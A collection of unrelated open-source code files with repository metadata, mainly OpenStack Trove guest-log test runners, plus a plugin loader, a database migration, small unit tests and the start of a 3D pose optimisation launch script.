"bytes": "6367"
},
{
"name": "C++",
"bytes": "88959"
},
{
"name": "HTML",
"bytes": "2043"
},
{
"name": "Makefile",
"bytes": "2728"
},
{
"name": "Objective-C",
"bytes": "422"
},
{
"name": "Python",
"bytes": "57970"
},
{
"name": "Shell",
"bytes": "2519"
}
],
"symlink_target": ""
}
|
import imp
import os
plugin_folder = os.path.join(os.path.dirname(os.path.abspath(__file__)))
main_module = '__init__'
def get_plugins():
plugins = []
possible_plugins = os.listdir(plugin_folder)
for i in possible_plugins:
location = os.path.join(plugin_folder, i)
if not os.path.isdir(location) or not main_module + '.py' in os.listdir(location):
continue
info = imp.find_module(main_module, [location])
plugins.append({'name': i, 'info': info})
return plugins
def load_plugin(plugin):
return imp.load_module(plugin['name'], *plugin['info'])
|
{
"content_hash": "555cf2f3264ed4da9b8cfb513af0b980",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 90,
"avg_line_length": 29.142857142857142,
"alnum_prop": 0.6388888888888888,
"repo_name": "z/xonotic-map-manager",
"id": "59bb4102f31e97c76e45981691404fa9022901be",
"size": "612",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "xmm/plugins/pluginloader.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "840"
},
{
"name": "Python",
"bytes": "97980"
},
{
"name": "Shell",
"bytes": "2053"
}
],
"symlink_target": ""
}
|
from story.models import Story
def test_story_creation(data_dict):
story = Story.objects.create(**data_dict)
assert str(story) == data_dict['name']
|
{
"content_hash": "243ab51fa8036b06e29aa94cb009f970",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 45,
"avg_line_length": 22.714285714285715,
"alnum_prop": 0.6981132075471698,
"repo_name": "DjangoGirls/djangogirls",
"id": "f0e1a985153acf8cf3c4187123acad338fb7344a",
"size": "159",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/story/test_models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "428291"
},
{
"name": "JavaScript",
"bytes": "13711"
},
{
"name": "Python",
"bytes": "422267"
},
{
"name": "Stylus",
"bytes": "32803"
}
],
"symlink_target": ""
}
|
from time import sleep
from treehopper.api import *
from treehopper.libraries.sensors.optical import Tsl2591
board = find_boards()[0]
board.connect()
sensor = Tsl2591(board.i2c)
while board.connected:
print(sensor.lux)
sleep(0.1)
|
{
"content_hash": "beacf6fb6c2fef6211fb0fa244ec401e",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 56,
"avg_line_length": 21.818181818181817,
"alnum_prop": 0.7541666666666667,
"repo_name": "treehopper-electronics/treehopper-sdk",
"id": "110ab53e495913c88d78cab6d7239e47f29fb858",
"size": "240",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python/library_examples/sensors/optical/tsl2591.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "6296"
},
{
"name": "Batchfile",
"bytes": "183"
},
{
"name": "C",
"bytes": "522458"
},
{
"name": "C#",
"bytes": "2112573"
},
{
"name": "C++",
"bytes": "517633"
},
{
"name": "CMake",
"bytes": "4426"
},
{
"name": "Java",
"bytes": "552020"
},
{
"name": "Jupyter Notebook",
"bytes": "169891"
},
{
"name": "Limbo",
"bytes": "19"
},
{
"name": "MATLAB",
"bytes": "1860"
},
{
"name": "Python",
"bytes": "599033"
}
],
"symlink_target": ""
}
|
from foreman import define_rule
COUNT = 0
if COUNT > 0:
raise AssertionError('load more than once')
COUNT += 1
# This creates a circular dependency!
define_rule('rule_y').depend('//pkg1/pkg2:rule_x')
|
{
"content_hash": "c635f140d2c127161dcaea7ee61fc773",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 50,
"avg_line_length": 18.90909090909091,
"alnum_prop": 0.7019230769230769,
"repo_name": "clchiou/garage",
"id": "fa9b44abb86e8d6a82948e8477c7144c6a527f9e",
"size": "208",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/foreman/tests/testdata/path2/pkg3/build.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Cap'n Proto",
"bytes": "6917"
},
{
"name": "HTML",
"bytes": "113"
},
{
"name": "Java",
"bytes": "61027"
},
{
"name": "Python",
"bytes": "1653733"
},
{
"name": "Shell",
"bytes": "6209"
}
],
"symlink_target": ""
}
|
from swiftclient.client import ClientException
import tempfile
from troveclient.compat import exceptions
from trove.common import cfg
from trove.guestagent.common import operating_system
from trove.guestagent import guest_log
from trove.tests.config import CONFIG
from trove.tests.scenario.helpers.test_helper import DataType
from trove.tests.scenario.runners.test_runners import TestRunner
CONF = cfg.CONF
class GuestLogRunner(TestRunner):
def __init__(self):
super(GuestLogRunner, self).__init__()
self.container = CONF.guest_log_container_name
self.prefix_pattern = '%(instance_id)s/%(datastore)s-%(log)s/'
self._last_log_published = {}
self._last_log_contents = {}
def _get_last_log_published(self, log_name):
return self._last_log_published.get(log_name, None)
def _set_last_log_published(self, log_name, published):
self._last_log_published[log_name] = published
def _get_last_log_contents(self, log_name):
return self._last_log_contents.get(log_name, [])
def _set_last_log_contents(self, log_name, published):
self._last_log_contents[log_name] = published
def _get_exposed_user_log_names(self):
"""Returns the full list of exposed user logs."""
return self.test_helper.get_exposed_user_log_names()
def _get_exposed_user_log_name(self):
"""Return the first exposed user log name."""
return self.test_helper.get_exposed_user_log_names()[0]
def _get_unexposed_sys_log_name(self):
"""Return the first unexposed sys log name."""
return self.test_helper.get_unexposed_sys_log_names()[0]
def run_test_log_list(self):
self.assert_log_list(self.auth_client,
self.test_helper.get_exposed_log_list())
def assert_log_list(self, client, expected_list):
log_list = list(client.instances.log_list(self.instance_info.id))
log_names = list(ll.name for ll in log_list)
self.assert_list_elements_equal(expected_list, log_names)
def run_test_admin_log_list(self):
self.assert_log_list(self.admin_client,
self.test_helper.get_full_log_list())
def run_test_log_show(self):
log_pending = self._set_zero_or_none()
self.assert_log_show(self.auth_client,
self._get_exposed_user_log_name(),
expected_published=0,
expected_pending=log_pending)
def _set_zero_or_none(self):
"""This attempts to handle the case where an existing instance
is used. Values that would normally be '0' are not, and must
be ignored.
"""
value = 0
if self.is_using_existing_instance:
value = None
return value
def assert_log_show(self, client, log_name,
expected_http_code=200,
expected_type=guest_log.LogType.USER.name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=None, expected_pending=None):
self.report.log("Executing log_show for log '%s'" % log_name)
log_details = client.instances.log_show(
self.instance_info.id, log_name)
self.assert_client_code(expected_http_code)
self.assert_log_details(
log_details, log_name,
expected_type=expected_type,
expected_status=expected_status,
expected_published=expected_published,
expected_pending=expected_pending)
def assert_log_details(self, log_details, expected_log_name,
expected_type=guest_log.LogType.USER.name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=None, expected_pending=None):
"""Check that the action generates the proper response data.
For log_published and log_pending, setting the value to 'None'
will skip that check (useful when using an existing instance,
as there may be pending things in user logs right from the get-go)
and setting it to a value other than '0' will verify that the actual
value is '>=value' (since it's impossible to know what the actual
value will be at any given time). '0' will still match exclusively.
"""
self.report.log("Validating log details for log '%s'" %
expected_log_name)
self._set_last_log_published(expected_log_name, log_details.published)
self.assert_equal(expected_log_name, log_details.name,
"Wrong log name for '%s' log" % expected_log_name)
self.assert_equal(expected_type, log_details.type,
"Wrong log type for '%s' log" % expected_log_name)
current_status = log_details.status.replace(' ', '_')
self.assert_equal(expected_status, current_status,
"Wrong log status for '%s' log" % expected_log_name)
if expected_published is None:
pass
elif expected_published == 0:
self.assert_equal(0, log_details.published,
"Wrong log published for '%s' log" %
expected_log_name)
else:
self.assert_true(log_details.published >= expected_published,
"Missing log published for '%s' log: "
"expected %d, got %d" %
(expected_log_name, expected_published,
log_details.published))
if expected_pending is None:
pass
elif expected_pending == 0:
self.assert_equal(0, log_details.pending,
"Wrong log pending for '%s' log" %
expected_log_name)
else:
self.assert_true(log_details.pending >= expected_pending,
"Missing log pending for '%s' log: "
"expected %d, got %d" %
(expected_log_name, expected_pending,
log_details.pending))
container = self.container
prefix = self.prefix_pattern % {
'instance_id': self.instance_info.id,
'datastore': CONFIG.dbaas_datastore,
'log': expected_log_name}
metafile = prefix.rstrip('/') + '_metafile'
if expected_published == 0:
self.assert_storage_gone(container, prefix, metafile)
container = 'None'
prefix = 'None'
else:
self.assert_storage_exists(container, prefix, metafile)
self.assert_equal(container, log_details.container,
"Wrong log container for '%s' log" %
expected_log_name)
self.assert_equal(prefix, log_details.prefix,
"Wrong log prefix for '%s' log" % expected_log_name)
self.assert_equal(metafile, log_details.metafile,
"Wrong log metafile for '%s' log" %
expected_log_name)
def assert_log_enable(self, client, log_name,
expected_http_code=200,
expected_type=guest_log.LogType.USER.name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=None, expected_pending=None):
self.report.log("Executing log_enable for log '%s'" % log_name)
log_details = client.instances.log_enable(
self.instance_info.id, log_name)
self.assert_client_code(expected_http_code)
self.assert_log_details(
log_details, log_name,
expected_type=expected_type,
expected_status=expected_status,
expected_published=expected_published,
expected_pending=expected_pending)
def assert_log_disable(self, client, log_name, discard=None,
expected_http_code=200,
expected_type=guest_log.LogType.USER.name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=None, expected_pending=None):
self.report.log("Executing log_disable for log '%s' (discard: %s)" %
(log_name, discard))
log_details = client.instances.log_disable(
self.instance_info.id, log_name, discard=discard)
self.assert_client_code(expected_http_code)
self.assert_log_details(
log_details, log_name,
expected_type=expected_type,
expected_status=expected_status,
expected_published=expected_published,
expected_pending=expected_pending)
def assert_log_publish(self, client, log_name, disable=None, discard=None,
expected_http_code=200,
expected_type=guest_log.LogType.USER.name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=None, expected_pending=None):
self.report.log("Executing log_publish for log '%s' (disable: %s "
"discard: %s)" %
(log_name, disable, discard))
log_details = client.instances.log_publish(
self.instance_info.id, log_name, disable=disable, discard=discard)
self.assert_client_code(expected_http_code)
self.assert_log_details(
log_details, log_name,
expected_type=expected_type,
expected_status=expected_status,
expected_published=expected_published,
expected_pending=expected_pending)
def assert_log_discard(self, client, log_name,
expected_http_code=200,
expected_type=guest_log.LogType.USER.name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=None, expected_pending=None):
self.report.log("Executing log_discard for log '%s'" % log_name)
log_details = client.instances.log_discard(
self.instance_info.id, log_name)
self.assert_client_code(expected_http_code)
self.assert_log_details(
log_details, log_name,
expected_type=expected_type,
expected_status=expected_status,
expected_published=expected_published,
expected_pending=expected_pending)
def assert_storage_gone(self, container, prefix, metafile):
try:
headers, container_files = self.swift_client.get_container(
container, prefix=prefix)
self.assert_equal(0, len(container_files),
"Found files in %s/%s: %s" %
(container, prefix, container_files))
except ClientException as ex:
if ex.http_status == 404:
self.report.log("Container '%s' does not exist" %
container)
pass
else:
raise
try:
self.swift_client.get_object(container, metafile)
self.fail("Found metafile after discard: %s" % metafile)
except ClientException as ex:
if ex.http_status == 404:
self.report.log("Metafile '%s' gone as expected" %
metafile)
pass
else:
raise
def assert_storage_exists(self, container, prefix, metafile):
try:
headers, container_files = self.swift_client.get_container(
container, prefix=prefix)
self.assert_true(len(container_files) > 0,
"No files found in %s/%s" %
(container, prefix))
except ClientException as ex:
if ex.http_status == 404:
self.fail("Container '%s' does not exist" % container)
else:
raise
try:
self.swift_client.get_object(container, metafile)
except ClientException as ex:
if ex.http_status == 404:
self.fail("Missing metafile: %s" % metafile)
else:
raise
def run_test_log_enable_sys(self,
expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_enable_fails(
self.admin_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def assert_log_enable_fails(self, client,
expected_exception, expected_http_code,
log_name):
self.assert_raises(expected_exception, None,
client.instances.log_enable,
self.instance_info.id, log_name)
# we may not be using the main client, so check explicitly here
self.assert_client_code(expected_http_code, client)
def run_test_log_disable_sys(self,
expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_disable_fails(
self.admin_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def assert_log_disable_fails(self, client,
expected_exception, expected_http_code,
log_name, discard=None):
self.assert_raises(expected_exception, None,
client.instances.log_disable,
self.instance_info.id, log_name,
discard=discard)
# we may not be using the main client, so check explicitly here
self.assert_client_code(expected_http_code, client)
def run_test_log_show_unauth_user(self,
expected_exception=exceptions.NotFound,
expected_http_code=404):
self.assert_log_show_fails(
self.unauth_client,
expected_exception, expected_http_code,
self._get_exposed_user_log_name())
def assert_log_show_fails(self, client,
expected_exception, expected_http_code,
log_name):
self.assert_raises(expected_exception, None,
client.instances.log_show,
self.instance_info.id, log_name)
# we may not be using the main client, so check explicitly here
self.assert_client_code(expected_http_code, client)
def run_test_log_list_unauth_user(self,
expected_exception=exceptions.NotFound,
expected_http_code=404):
self.assert_raises(expected_exception, None,
self.unauth_client.instances.log_list,
self.instance_info.id)
# we're not using the main client, so check explicitly here
self.assert_client_code(expected_http_code, self.unauth_client)
def run_test_log_generator_unauth_user(self):
self.assert_log_generator_unauth_user(
self.unauth_client, self._get_exposed_user_log_name())
def assert_log_generator_unauth_user(self, client, log_name, publish=None):
try:
client.instances.log_generator(
self.instance_info.id, log_name, publish=publish)
raise("Client allowed unauthorized access to log_generator")
except Exception:
pass
def run_test_log_generator_publish_unauth_user(self):
self.assert_log_generator_unauth_user(
self.unauth_client, self._get_exposed_user_log_name(),
publish=True)
def run_test_log_show_unexposed_user(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_show_fails(
self.auth_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def run_test_log_enable_unexposed_user(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_enable_fails(
self.auth_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def run_test_log_disable_unexposed_user(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_disable_fails(
self.auth_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def run_test_log_publish_unexposed_user(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_publish_fails(
self.auth_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def assert_log_publish_fails(self, client,
expected_exception, expected_http_code,
log_name,
disable=None, discard=None):
self.assert_raises(expected_exception, None,
client.instances.log_publish,
self.instance_info.id, log_name,
disable=disable, discard=discard)
# we may not be using the main client, so check explicitly here
self.assert_client_code(expected_http_code, client)
def run_test_log_discard_unexposed_user(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_discard_fails(
self.auth_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def assert_log_discard_fails(self, client,
expected_exception, expected_http_code,
log_name):
self.assert_raises(expected_exception, None,
client.instances.log_discard,
self.instance_info.id, log_name)
# we may not be using the main client, so check explicitly here
self.assert_client_code(expected_http_code, client)
def run_test_log_enable_user(self):
expected_status = guest_log.LogStatus.Ready.name
expected_pending = 1
if self.test_helper.log_enable_requires_restart():
expected_status = guest_log.LogStatus.Restart_Required.name
# if using an existing instance, there may already be something
expected_pending = self._set_zero_or_none()
for log_name in self._get_exposed_user_log_names():
self.assert_log_enable(
self.auth_client,
log_name,
expected_status=expected_status,
expected_published=0, expected_pending=expected_pending)
def run_test_log_enable_flip_user(self):
# for restart required datastores, test that flipping them
# back to disabled returns the status to 'Disabled'
# from 'Restart_Required'
if self.test_helper.log_enable_requires_restart():
# if using an existing instance, there may already be something
expected_pending = self._set_zero_or_none()
for log_name in self._get_exposed_user_log_names():
self.assert_log_disable(
self.auth_client,
log_name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=0, expected_pending=expected_pending)
self.assert_log_enable(
self.auth_client,
log_name,
expected_status=guest_log.LogStatus.Restart_Required.name,
expected_published=0, expected_pending=expected_pending)
def run_test_restart_datastore(self, expected_http_code=202):
if self.test_helper.log_enable_requires_restart():
instance_id = self.instance_info.id
# we need to wait until the heartbeat flips the instance
# back into 'ACTIVE' before we issue the restart command
expected_states = ['RESTART_REQUIRED', 'ACTIVE']
self.assert_instance_action(instance_id, expected_states, None)
self.auth_client.instances.restart(instance_id)
self.assert_client_code(expected_http_code)
def run_test_wait_for_restart(self, expected_states=['REBOOT', 'ACTIVE']):
if self.test_helper.log_enable_requires_restart():
self.assert_instance_action(self.instance_info.id,
expected_states, None)
def run_test_log_publish_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_log_publish(
self.auth_client,
log_name,
expected_status=guest_log.LogStatus.Published.name,
expected_published=1, expected_pending=0)
def run_test_add_data(self):
self.test_helper.add_data(DataType.micro, self.get_instance_host())
def run_test_verify_data(self):
self.test_helper.verify_data(DataType.micro, self.get_instance_host())
def run_test_log_publish_again_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_log_publish(
self.admin_client,
log_name,
expected_status=guest_log.LogStatus.Published.name,
expected_published=self._get_last_log_published(log_name),
expected_pending=0)
def run_test_log_generator_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_log_generator(
self.auth_client,
log_name,
lines=2, expected_lines=2)
def assert_log_generator(self, client, log_name, publish=False,
lines=4, expected_lines=None,
swift_client=None):
self.report.log("Executing log_generator for log '%s' (publish: %s)" %
(log_name, publish))
log_gen = client.instances.log_generator(
self.instance_info.id, log_name,
publish=publish, lines=lines, swift=swift_client)
log_contents = "".join([chunk for chunk in log_gen()])
self.report.log("Returned %d lines for log '%s': %s" % (
len(log_contents.splitlines()), log_name, log_contents))
self._set_last_log_contents(log_name, log_contents)
if expected_lines:
self.assert_equal(expected_lines,
len(log_contents.splitlines()),
"Wrong line count for '%s' log" % log_name)
else:
self.assert_true(len(log_contents.splitlines()) <= lines,
"More than %d lines found for '%s' log" %
(lines, log_name))
def run_test_log_generator_publish_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_log_generator(
self.auth_client,
log_name, publish=True,
lines=3, expected_lines=3)
def run_test_log_generator_swift_client_user(self):
swift_client = self.swift_client
for log_name in self._get_exposed_user_log_names():
self.assert_log_generator(
self.auth_client,
log_name, publish=True,
lines=3, expected_lines=3,
swift_client=swift_client)
def run_test_add_data_again(self):
# Add some more data so we have at least 3 log data files
self.test_helper.add_data(DataType.micro2, self.get_instance_host())
def run_test_verify_data_again(self):
self.test_helper.verify_data(DataType.micro2, self.get_instance_host())
def run_test_log_generator_user_by_row(self):
log_name = self._get_exposed_user_log_name()
self.assert_log_publish(
self.auth_client,
log_name,
expected_status=guest_log.LogStatus.Published.name,
expected_published=self._get_last_log_published(log_name),
expected_pending=0)
# Now get the full contents of the log
self.assert_log_generator(self.auth_client, log_name, lines=100000)
log_lines = len(self._get_last_log_contents(log_name).splitlines())
# cap at 100, so the test can't run away if something goes wrong
log_lines = min(log_lines, 100)
# Make sure we get the right number of log lines back each time
for lines in range(1, log_lines):
self.assert_log_generator(
self.auth_client,
log_name, lines=lines, expected_lines=lines)
def run_test_log_save_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_test_log_save(self.auth_client, log_name)
def run_test_log_save_publish_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_test_log_save(self.auth_client, log_name, publish=True)
def assert_test_log_save(self, client, log_name, publish=False):
# generate the file
self.report.log("Executing log_save for log '%s' (publish: %s)" %
(log_name, publish))
with tempfile.NamedTemporaryFile() as temp_file:
client.instances.log_save(self.instance_info.id,
log_name=log_name, publish=publish,
filename=temp_file.name)
file_contents = operating_system.read_file(temp_file.name)
# now grab the contents ourselves
self.assert_log_generator(client, log_name, lines=100000)
# and compare them
self.assert_equal(self._get_last_log_contents(log_name),
file_contents)
def run_test_log_discard_user(self):
for log_name in self._get_exposed_user_log_names():
self.assert_log_discard(
self.auth_client,
log_name,
expected_status=guest_log.LogStatus.Ready.name,
expected_published=0, expected_pending=1)
def run_test_log_disable_user(self):
expected_status = guest_log.LogStatus.Disabled.name
if self.test_helper.log_enable_requires_restart():
expected_status = guest_log.LogStatus.Restart_Required.name
for log_name in self._get_exposed_user_log_names():
self.assert_log_disable(
self.auth_client,
log_name,
expected_status=expected_status,
expected_published=0, expected_pending=1)
def run_test_log_show_sys(self):
self.assert_log_show(
self.admin_client,
self._get_unexposed_sys_log_name(),
expected_type=guest_log.LogType.SYS.name,
expected_status=guest_log.LogStatus.Ready.name,
expected_published=0, expected_pending=1)
def run_test_log_publish_sys(self):
log_name = self._get_unexposed_sys_log_name()
self.assert_log_publish(
self.admin_client,
log_name,
expected_type=guest_log.LogType.SYS.name,
expected_status=guest_log.LogStatus.Partial.name,
expected_published=1, expected_pending=1)
def run_test_log_publish_again_sys(self):
log_name = self._get_unexposed_sys_log_name()
self.assert_log_publish(
self.admin_client,
log_name,
expected_type=guest_log.LogType.SYS.name,
expected_status=guest_log.LogStatus.Partial.name,
expected_published=self._get_last_log_published(log_name) + 1,
expected_pending=1)
def run_test_log_generator_sys(self):
self.assert_log_generator(
self.admin_client,
self._get_unexposed_sys_log_name(),
lines=4, expected_lines=4)
def run_test_log_generator_publish_sys(self):
self.assert_log_generator(
self.admin_client,
self._get_unexposed_sys_log_name(), publish=True,
lines=4, expected_lines=4)
def run_test_log_generator_swift_client_sys(self):
self.assert_log_generator(
self.admin_client,
self._get_unexposed_sys_log_name(), publish=True,
lines=4, expected_lines=4,
swift_client=self.swift_client)
def run_test_log_save_sys(self):
self.assert_test_log_save(
self.admin_client,
self._get_unexposed_sys_log_name())
def run_test_log_save_publish_sys(self):
self.assert_test_log_save(
self.admin_client,
self._get_unexposed_sys_log_name(),
publish=True)
def run_test_log_discard_sys(self):
self.assert_log_discard(
self.admin_client,
self._get_unexposed_sys_log_name(),
expected_type=guest_log.LogType.SYS.name,
expected_status=guest_log.LogStatus.Ready.name,
expected_published=0, expected_pending=1)
class CassandraGuestLogRunner(GuestLogRunner):
def run_test_log_show(self):
log_pending = self._set_zero_or_none()
self.assert_log_show(self.auth_client,
self._get_exposed_user_log_name(),
expected_published=None,
expected_pending=log_pending)
|
{
"content_hash": "b8e0f2e10251fa267ea5540b823e4308",
"timestamp": "",
"source": "github",
"line_count": 672,
"max_line_length": 79,
"avg_line_length": 44.82738095238095,
"alnum_prop": 0.5731642544150843,
"repo_name": "Tesora-Release/tesora-trove",
"id": "cdd8c6e5fb5903b0fd05151f5d0f6fd6f45f59e0",
"size": "30728",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "trove/tests/scenario/runners/guest_log_runners.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "88"
},
{
"name": "CSS",
"bytes": "21914"
},
{
"name": "JavaScript",
"bytes": "60539"
},
{
"name": "Python",
"bytes": "4614445"
},
{
"name": "Shell",
"bytes": "16661"
},
{
"name": "XSLT",
"bytes": "50542"
}
],
"symlink_target": ""
}
|
"""
.. module: security_monkey.tests.watchers.vpc.test_networkacl
:platform: Unix
.. version:: $$VERSION$$
.. moduleauthor:: Bridgewater OSS <opensource@bwater.com>
"""
from security_monkey.tests.watchers import SecurityMonkeyWatcherTestCase
from security_monkey.watchers.vpc.networkacl import NetworkACL
import boto
from moto import mock_sts, mock_ec2_deprecated
from freezegun import freeze_time
class NetworkACLWatcherTestCase(SecurityMonkeyWatcherTestCase):
@freeze_time("2016-07-18 12:00:00")
@mock_sts
@mock_ec2_deprecated
def test_slurp(self):
conn = boto.connect_vpc('the_key', 'the secret')
vpc = conn.create_vpc("10.0.0.0/16")
watcher = NetworkACL(accounts=[self.account.name])
item_list, exception_map = watcher.slurp()
vpc_ids = {nacl.config['vpc_id'] for nacl in item_list}
self.assertIn(vpc.id, vpc_ids)
|
{
"content_hash": "ba9820658143c9a4721735cf28550b5a",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 72,
"avg_line_length": 28.870967741935484,
"alnum_prop": 0.7050279329608938,
"repo_name": "Netflix/security_monkey",
"id": "8b13a3c5873b0048c702d0c93f9e15b8ca9ce131",
"size": "1521",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "security_monkey/tests/watchers/vpc/test_networkacl.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "22837"
},
{
"name": "Dart",
"bytes": "130852"
},
{
"name": "Dockerfile",
"bytes": "3841"
},
{
"name": "HTML",
"bytes": "120266"
},
{
"name": "JavaScript",
"bytes": "13728"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "1578684"
},
{
"name": "Shell",
"bytes": "30939"
}
],
"symlink_target": ""
}
|
"""Add Issues
Revision ID: 19471f93d42
Revises: 56bda17c92ee
Create Date: 2015-03-27 16:46:53.627287
"""
# revision identifiers, used by Alembic.
revision = '19471f93d42'
down_revision = '56bda17c92ee'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'issues',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('os_state', sa.String(length=250), nullable=False),
sa.Column('test_plan', sa.Text(), nullable=True),
sa.Column('end_date', sa.Date(), nullable=True),
sa.Column('start_date', sa.Date(), nullable=True),
sa.Column('status', sa.String(length=250), nullable=True),
sa.Column('notes', sa.Text(), nullable=True),
sa.Column('description', sa.Text(), nullable=True),
sa.Column('url', sa.String(length=250), nullable=True),
sa.Column('reference_url', sa.String(length=250), nullable=True),
sa.Column('secondary_contact_id', sa.Integer(), nullable=True),
sa.Column('contact_id', sa.Integer(), nullable=True),
sa.Column('title', sa.String(length=250), nullable=False),
sa.Column('slug', sa.String(length=250), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('modified_by_id', sa.Integer(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('context_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['contact_id'], ['people.id'], ),
sa.ForeignKeyConstraint(['context_id'], ['contexts.id'], ),
sa.ForeignKeyConstraint(['secondary_contact_id'], ['people.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('slug', name='uq_issues'),
sa.UniqueConstraint('title', name='uq_t_issues')
)
def downgrade():
op.drop_table('issues')
|
{
"content_hash": "046df8ae3b109d5ce04d072b65ccba16",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 73,
"avg_line_length": 37.625,
"alnum_prop": 0.6528239202657807,
"repo_name": "vladan-m/ggrc-core",
"id": "70d5eea25dd57afaf3df62ab78ca33abdb311d7e",
"size": "1807",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "src/ggrc/migrations/versions/20150327164653_19471f93d42_add_issues.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "230813"
},
{
"name": "Cucumber",
"bytes": "148444"
},
{
"name": "HTML",
"bytes": "6041162"
},
{
"name": "JavaScript",
"bytes": "1893341"
},
{
"name": "Makefile",
"bytes": "5483"
},
{
"name": "Mako",
"bytes": "1720"
},
{
"name": "Python",
"bytes": "1489657"
},
{
"name": "Ruby",
"bytes": "1496"
},
{
"name": "Shell",
"bytes": "11555"
}
],
"symlink_target": ""
}
|
"""Launch script for running a full probabilistic iterative solver baseline."""
from absl import app
from absl import flags
import tensorflow as tf
import tensorflow_datasets as tfds
from metapose import data_utils
from metapose import inference_time_optimization as inf_opt
_INPUT_PATH = flags.DEFINE_string(
'input_path', '',
'path to an folder containing a tfrec file and a features.json file')
_OUTPUT_PATH = flags.DEFINE_string(
'output_path', None,
'path to the output a dataset with refined 3d poses')
_N_STEPS = flags.DEFINE_integer('n_steps', 100, 'optimizer (adam) steps')
_DEBUG_FIRST_N = flags.DEFINE_integer(
'debug_first_n', None, 'read only first n records')
_LEARNING_RATE = flags.DEFINE_float(
'learning_rate', 1e-2, 'optimizer (adam) learning rate')
_REPORT_N_APPROX = flags.DEFINE_integer(
'report_n_approx', 50,
'number of intermediate optimization results to report')
_CAM_SUBSET = flags.DEFINE_list(
'cam_subset', list(map(str, range(4))),
'comma-separated list of camera ids to use, e.g. 3,4,5')
_GT_HEATMAPS = flags.DEFINE_bool(
'gt_heatmaps', False,
'whether to replace heatmaps with fake ground truth heatmaps')
_FAKE_GT_HT_STD = flags.DEFINE_float(
'fake_gt_ht_std', 0.0,
'how much noise to add to positions of means of fake gt heatmaps')
_USE_WEAK_REPR = flags.DEFINE_bool(
'use_weak_repr', False,
'whether to use weak projection to get ground truth heatmaps')
_FAKE_GT_INIT = flags.DEFINE_bool(
'fake_gt_init', False,
'whether to use ground truth instead of monocular 3d predictions')
_RANDOM_INIT = flags.DEFINE_bool(
'random_init', False,
'whether to use random noise instead of monocular 3d predictions')
_EDGE_LENS_LAMBDA = flags.DEFINE_float(
'edge_lens_lambda', 0.0,
'weight of the normalized limb length loss during refinement')
flags.mark_flag_as_required('output_path')
def main(_):
cam_subset = list(map(int, _CAM_SUBSET.value))
n_cam = len(cam_subset)
report_n = (
_N_STEPS.value // (_N_STEPS.value // (_REPORT_N_APPROX.value - 1)) + 1)
output_shape_dtype = {
# optimization results
'loss': ([report_n], tf.float32),
'iters': ([report_n], tf.int32),
'pose3d_opt_preds': ([report_n, 17, 3], tf.float32),
'cam_rot_opt_preds': ([report_n, n_cam, 3, 3], tf.float32),
'scale_opt_preds': ([report_n, n_cam], tf.float32),
'shift_opt_preds': ([report_n, n_cam, 3], tf.float32),
# metrics
'pose2d_opt_preds': ([report_n, n_cam, 17, 2], tf.float32),
'pose3d_gt_aligned_pred_3d_proj': ([report_n, n_cam, 17, 2], tf.float32),
'pose3d_pred_pmpjpe': ([report_n], tf.float32),
'pose2d_pred_err': ([report_n], tf.float32),
'pose2d_pred_vs_posenet_err': ([report_n], tf.float32),
